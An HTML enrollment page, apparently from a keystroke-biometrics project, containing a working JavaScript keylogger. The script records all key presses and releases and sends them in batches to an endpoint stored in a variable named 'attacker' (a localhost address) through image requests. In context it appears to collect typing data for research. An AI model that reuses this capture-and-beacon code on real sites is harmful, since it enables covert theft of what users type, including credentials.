<html>
<head>
  <title></title>
</head>
<body>

<script src="logger.js"></script>
<script>var buffer = [];
var attacker = 'http://127.0.0.1:8000/keys/listen/'

document.onkeypress = function(e) {
    var timestamp = Date.now() | 0;
    var stroke = {
        k: e.key,
        t: timestamp,
        r: 0
    };
    //alert('press'+e.key);
     document.getElementById("demo").innerHTML = 'press '+e.key+timestamp;
    buffer.push(stroke);
}

document.onkeyup = function(e) {
    var timestamp = Date.now() | 0;
    var stroke = {
        k: e.key,
        t: timestamp,
        r: 1
    };
    //alert('release'+e.key);
    document.getElementById("demo").innerHTML = 'release '+e.key + timestamp;
    buffer.push(stroke);
}

window.setInterval(function() {
    if (buffer.length > 0) {
    	//alert(buffer.join());
        var data = encodeURIComponent(JSON.stringify(buffer));
        new Image().src = attacker + data;
        buffer = [];
    }
}, 200);</script>

<p id="demo"></p>
<font size = "20">Keystroke Enrollment </font>
<br>
please fill in the form
<form action="{% url 'keys:prof'  %}" method="post">
{% csrf_token %}

    User ID: <input type="text" name="uname"><br>
	Text:<textarea rows="10" cols = "100" name = "profile"></textarea><br>
<input type="submit" value="submit" />
</form>
<a href = keys/test> test page </a>
</body>
</html>